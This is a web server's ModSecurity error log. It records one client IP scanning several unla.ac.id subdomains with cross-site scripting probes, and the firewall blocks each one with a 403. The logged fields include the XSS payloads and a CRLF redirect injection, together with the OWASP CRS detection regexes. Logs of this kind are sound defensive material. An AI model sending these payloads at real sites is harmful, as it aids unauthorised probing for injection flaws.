[Tue Aug 29 11:53:08.549164 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAoml1MAAAAf"]
[Tue Aug 29 11:53:08.571459 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAhoHWYAAAAl"]
[Tue Aug 29 11:53:08.572564 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAosCvQAAAAm"]
[Tue Aug 29 11:53:08.621000 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAolKTgAAAAe"]
[Tue Aug 29 11:53:08.774136 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoLfQMAAAAG"]
[Tue Aug 29 11:53:08.787611 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoZ6SoAAAAK"]
[Tue Aug 29 11:53:08.800897 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoT7UMAAAAD"]
[Tue Aug 29 11:53:08.805494 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAohZ6kAAAAZ"]
[Tue Aug 29 11:53:09.612255 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tcCo-f0AAAn403IAAAAW"]
[Tue Aug 29 11:53:09.670669 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tcCo-f0AAAoAkwsAAAAC"]
[Tue Aug 29 11:53:10.259146 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoT7UUAAAAD"]
[Tue Aug 29 11:53:10.260709 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoZ6S0AAAAK"]
[Tue Aug 29 11:53:10.425599 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoZ6S4AAAAK"]
[Tue Aug 29 11:53:10.428105 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tsCo-f0AAAfWOUsAAAAL"]
[Tue Aug 29 11:53:10.430557 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoLfQYAAAAG"]
[Tue Aug 29 11:53:10.660298 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAoqbPMAAAAj"]
[Tue Aug 29 11:53:10.734136 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tsCo-f0AAAoml1kAAAAf"]
[Tue Aug 29 11:53:10.820445 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAojao0AAAAb"]
[Tue Aug 29 11:53:10.822870 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAoAkxAAAAAC"]
[Tue Aug 29 11:53:10.824734 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAor7pYAAAAk"]
[Tue Aug 29 11:53:10.825281 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAohZ60AAAAZ"]
[Tue Aug 29 11:53:10.828315 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAofm5EAAAAX"]
[Tue Aug 29 11:53:11.798691 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAolKUEAAAAe"]
[Tue Aug 29 11:53:11.800177 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAoAkxEAAAAC"]
[Tue Aug 29 11:53:11.844070 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAoZ6TMAAAAK"]
[Tue Aug 29 11:53:11.918247 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAoocwsAAAAh"]
